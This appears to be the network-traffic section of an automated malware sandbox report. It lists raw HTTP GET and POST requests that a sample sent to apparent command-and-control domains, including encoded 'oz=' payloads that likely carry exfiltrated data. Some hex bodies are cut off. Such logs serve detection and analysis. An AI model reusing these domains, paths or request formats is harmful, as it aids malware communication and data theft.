        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 4f 34 58 6b 4a 4c 4d 38 5a 52 42 30 56 59 38 59 73 70 4c 49 71 63 54 6e 77 2b 31 4f 45 52 4f 79 47 75 62 54 30 4d 51 5a 57 38 76 32 2f 51 4e 5a 6e 78 6d 30 5a 4a 5a 74 2b 43 42 64 77 6c 38 32 70 66 4e 46 74 62 44 32 71 74 34 68 4e 67 4e 67 62 44 70 62 2f 4e 33 46 44 72 47 66 75 70 6d 6b 61 6e 4e 48 36 5a 6a 79 58 34 36 4e 68 5a 75 37 7a 76 5a 66 6d 30 66 62 77 63 32 63 6b 72 73 44 56 30 39 4f 42 47 4f 6b 36 51 68 31 37 4d 77 69 34 72 4c 57 59 42 39 67 31 51 4e 55 4c 6f 56 66 67 36 6b 61 42 4d 4d 35 78 64 42 6a 76 32 58 50 5a 4f 70 6d 45 31 69 30 63 76 30 68 69 67 48 53 53 39 41 65 53 33 66 55 59 66 50 43 51 44 46 70 52 78 57 69 67 66 6c 5a 30 5a 62 51 6e 75 51 2b 42 75 4b 70 69 6d 57 2f 30 78 74 56 53 7a 63 6c 48 6a 30 4b 42 35 38 4e 6d 6b 67 6d 57 6b 65 45 30 52 30 56 4e 53 70 38 6a 71 49 53 39 45 59 76 66 54 7a 52 34 51 57 49 59 37 6d 4c 69 51 53 6e 49 34 6b 30 57 75 71 74 7a 42 42 38 33 4b 71 4b 55 54 50 74 74 76 6e 6a 2b 62 37 42 41 50 41 63 6a 41 34 45 33 61 45 64 31 2b 61 36 32 35 55 70 35 51 2b 6f 7a 6c 77 4a 69 38 78 64 31 63 53 44 2b 50 54 66 71 42 67 36 57 71 39 6b 4b 66 66 4f 36 57 35 6d 58 66 69 66 2b 4d 51 46 52 51 53 4f 6c 41 56 6f 4b 70 68 51 68 54 49 72 5a 37 73 43 4f 41 48 48 4f 6b 44 77 4f 68 39 33 2f 49 4d 61 62 44 4a 51 51 58 2b 51 36 6f 43 4f 71 73 6c 47 38 6b 51 44 68 57 67 79 30 70 63 4f 50 6a 72 76 30 79 6a 51 55 69 77 58 41 4c 53 34 54 78 4
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f 4f 6c 6d 69 74 56 77 57 48 76 6d 61 4a 41 56 52 5a 76 6e 53 4e 4f 78 42 48 44 48 73 78 6e 6c 45 4f 32 35 37 76 52 47 75 62 4d 37 47 6a 52 5a 34 32 48 77 57 6e 32 70 74 36 34 7a 6c 78 36 34 50 35 76 37 66 6c 44 41 6b 30 39 59 4f 57 73 58 4a 77 50 36 73 64 6d 73 79 33 31 45 33 62 6d 37 65 31 52 2f 6e 37 47 52 48 72 50 51 72 2f 2f 78 4a 66 37 64 31 7a 54 6d 44 78 6d 35 68 2f 73 50 79 58 71 35 4b 30 4f 6d 6e 73 34 37 45 69 78 55 6e 4a 4b 58 33 4a 41 65 6d 71 55 66 49 53 57 4f 47 68 58 67 4a 35 54 74 41 71 76 38 6a 62 52 79 55 4b 7a 48 52 68 55 64 4e 38 48 52 5a 54 32 56 63 31 75 35 6b 69 2f 2f 6d 74 69 73 4d 54 76 37 66 55 55 35 6f 75 77 55 4f 6e 69 49 79 39 70 78 73 6b 73 56 32 72 51 51 32 55 76 73 5a 44 58 45 72 61 75 74 49 45 4d 42 50 57 74 43 4f 30 55 41 7a 51 4a 35 64 2f 59 6d 73 71 4b 42 62 6f 37 54 2b 68 6f 55 35 4a 2b 35 44 48 65 49 70 45 69 56 50 4c 50 46 5a 76 44 4c 33 77 37 5a 61 7a 72 2b 77 70 66 54 66 54 49 58 41 6f 63 39 63 2b 38 73 79 79 66 4c 6b 49 58 74 36 41 55 37 79 49 77 6d 64 70 74 32 68 79 65 79 65 6a 56 41 33 56 43 6b 7a 42 38 5a 50 4b 35 52 63 53 52 45 45 4f 76 58 2b 61 48 47 4c 76 30 58 65 71 6b 38 4e 33 72 42 41 31 49 59 57 79 38 62 72 71 34 59 61 76 73 6d 6f 63 37 41 2b 34 62 56 46 75 78 46 31 58 4b 46 4e 33 4d 4a 4c 78 7a 76 57 45 6d 64 44 58 53 34 35 73 4d 71 67 54 2f 73 41 51 59 6d 34 78 2f 54 35 74 73 4d 48 6a 32 39 45 41 4
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 47 70 6e 30 74 37 46 54 75 30 41 39 55 55 4d 61 46 72 52 66 73 62 52 54 68 70 44 66 4c 78 5a 47 32 42 61 74 68 71 34 62 75 4e 5a 69 54 48 33 66 6f 47 6a 41 46 33 47 6b 76 72 59 6b 59 35 30 46 4c 70 7a 32 2f 74 38 56 31 6f 4e 31 34 79 63 59 73 76 50 47 4f 6c 71 68 31 6f 43 36 64 66 31 79 36 76 35 6c 57 53 79 4e 74 38 43 61 38 2f 2b 75 43 76 69 63 6e 4b 6f 54 45 62 77 4f 43 53 36 39 4b 57 6e 76 39 2f 4b 74 68 4f 75 54 5a 52 46 41 35 63 6b 45 71 53 4c 4a 4b 4b 4b 78 6f 72 32 56 6c 64 54 75 5a 4c 34 38 55 61 44 50 4c 52 76 71 4f 50 51 5a 39 4f 73 54 73 2b 64 72 32 4f 6f 45 57 70 6f 4f 39 55 34 70 4c 43 74 74 47 58 6b 32 4a 37 77 75 44 33 66 4a 67 77 66 6a 43 48 6a 37 71 4a 48 31 42 79 6b 69 6d 77 34 37 63 4d 65 49 72 76 71 76 4a 4f 6b 48 4f 52 5a 45 72 35 31 30 6d 42 38 30 37 6e 77 56 4d 57 71 76 33 49 4c 63 46 6b 53 7a 65 4e 4e 79 53 6f 39 53 74 39 33 30 75 4a 45 5a 6b 50 35 4d 78 55 59 6d 44 47 74 56 42 52 4b 71 35 70 53 32 33 4c 64 55 79 76 69 6f 43 6d 74 46 6b 2f 4e 77 6b 44 6b 6d 37 31 71 7a 4f 6a 56 31 62 58 30 58 30 32 68 41 30 46 42 43 48 47 6e 6d 64 43 70 37 43 67 37 64 4d 64 68 4f 4b 62 50 6b 67 4a 56 58 6a 73 6d 68 44 35 65 68 68 34 33 4f 6a 76 6c 37 66 4c 6e 56 73 76 78 55 74 6c 7a 65 5a 36 44 50 47 5a 73 59 78 73 59 79 51 42 56 59 77 7a 51 63 79 4d 57 4a 71 73 31 6b 50 72 66 59 77 52 6c 64 39 39 43 77 76 6f 42 6b 44 65 49 7a 62 2b 77 55 49 44 30 39 6a 30 52 50 72 35 47 67 68 55 6f 7a 44 46 2f 78 4f 54 7a 6d 34 58 51 67 58 50 55 4c 65 41 71 53 69 56 42 71 45 48 68 49 62 43 37 42 75 39 39 46 55 46 69 4c 76 77 62 36 4a 36 57 4e 71 4e 35 6d 64 2f 58 5a 52 4c 73 58 50 6e 64 46 4d 32 76 63 54 6c 58 30 64 38 51 74 38 73 53 34 68 75 61 43 52 4b 51 4c 61 79 76 35 43 65 4c 2b 4a 44 46 64 75 61 43 31 78 6d 78 6c 43 43 53 43 45 6b 7a 78 69 4a 6b 63 6c 2f 71 77 34 56 32 45 56 76 7a 64 58 44 34 37 46 78 46 4b 4a 37 63 76 62 6a 42 37 63 39 46 7a 6a 54 42 4a 44 46 76 54 38 70 46 57 48 77 61 30 4b 38 38 49 71 32 4a 2b 57 33 67 71 41 4c 46 2f 6b 51 39 46 6f 64 42 54 67 72 33 47 71 76 68 4c 72 41 61 52 6c 66 4d 44 71 44 33 74 2b 64 76 67 31 74 2f 73 39 61 75 50 57 62 35 72 76 45 65 67 71 43 6e 71 36 74 72 30 64 5a 70 32 49 4f 37 6d 69 77 57 59 32 33 4a 54 64 6c 51 54 49 4c 2b 37 51 46 58 5a 4e 70 76 32 70 34 56 6
        Source: global trafficHTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 33 35 39 77 55 49 75 65 33 56 38 61 6e 32 37 2f 76 46 62 66 67 6a 77 56 68 57 62 7a 37 30 63 52 32 50 5a 63 42 4a 7a 75 68 59 46 68 68 77 61 6d 41 32 49 6f 68 47 6a 57 42 56 52 55 76 55 34 7a 6b 39 38 68 74 67 6f 67 44 55 72 46 65 44 45 42 30 68 50 66 6f 65 33 4c 39 71 59 61 2b 77 55 71 74 36 56 34 57 57 46 6e 6c 50 6f 5a 79 68 52 56 6b 35 4d 4f 51 42 6f 39 73 46 4f 37 76 70 70 2b 77 53 54 39 56 62 48 2f 45 51 41 32 59 6a 79 58 50 37 74 57 42 75 41 75 58 55 57 39 42 34 59 63 69 59 53 67 38 58 45 48 51 47 2b 46 54 2f 6c 69 4a 2f 30 57 76 51 3d 3d Data Ascii: oz=64iNzW8jYbN7359wUIue3V8an27/vFbfgjwVhWbz70cR2PZcBJzuhYFhhwamA2IohGjWBVRUvU4zk98htgogDUrFeDEB0hPfoe3L9qYa+wUqt6V4WWFnlPoZyhRVk5MOQBo9sFO7vpp+wST9VbH/EQA2YjyXP7tWBuAuXUW9B4YciYSg8XEHQG+FT/liJ/0WvQ==
